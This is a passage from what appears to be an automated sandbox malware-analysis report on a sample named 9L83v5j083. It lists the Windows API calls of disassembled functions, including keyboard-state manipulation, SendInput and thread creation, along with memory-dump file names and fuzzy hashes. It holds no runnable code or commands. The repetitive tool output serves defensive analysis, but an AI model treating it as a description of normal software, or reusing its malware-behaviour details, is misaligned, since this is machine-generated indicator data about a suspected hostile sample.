                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                  • String ID: %lu$\VH
                                                                                                                  • API String ID: 3164766367-2432546070
                                                                                                                  • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                  • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                  • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                  • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                  • API String ID: 3850602802-3636473452
                                                                                                                  • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                  • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                  • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                  • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                  APIs
                                                                                                                  • _malloc.LIBCMT ref: 0041F707
                                                                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                  • _free.LIBCMT ref: 0041F71A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                                  • String ID: [B
                                                                                                                  • API String ID: 1020059152-632041663
                                                                                                                  • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                                                  • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                  • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                                                  • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                  APIs
                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                                  • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                                  • __getptd.LIBCMT ref: 00413DBD
                                                                                                                  • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                                  • _free.LIBCMT ref: 00413E07
                                                                                                                  • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 155776804-0
                                                                                                                  • Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                                                                                  • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                                  • Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                                                                                  • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                    • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1957940570-0
                                                                                                                  • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                  • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                  • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                  • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                  APIs
                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                  • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                  • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 259663610-0
                                                                                                                  • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                  • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                                  • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                  • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3220332590-0
                                                                                                                  • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                  • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                  • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                  • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1612042205-0
                                                                                                                  • Opcode ID: e3179c2987a62733692ceab765edd20725f5b951b4ff8c35c0042417233c487f
                                                                                                                  • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                                  • Opcode Fuzzy Hash: e3179c2987a62733692ceab765edd20725f5b951b4ff8c35c0042417233c487f
                                                                                                                  • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove_strncmp
                                                                                                                  • String ID: >$U$\
                                                                                                                  • API String ID: 2666721431-237099441
                                                                                                                  • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                  • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                                  • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                  • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                  • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                  • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                  • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2221674350-0
                                                                                                                  • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                  • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                  • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                  • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$_wcscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2037614760-0
                                                                                                                  • Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                                                                  • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                                  • Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                                                                  • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 960795272-0
                                                                                                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                  APIs
                                                                                                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4189319755-0
                                                                                                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                  • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
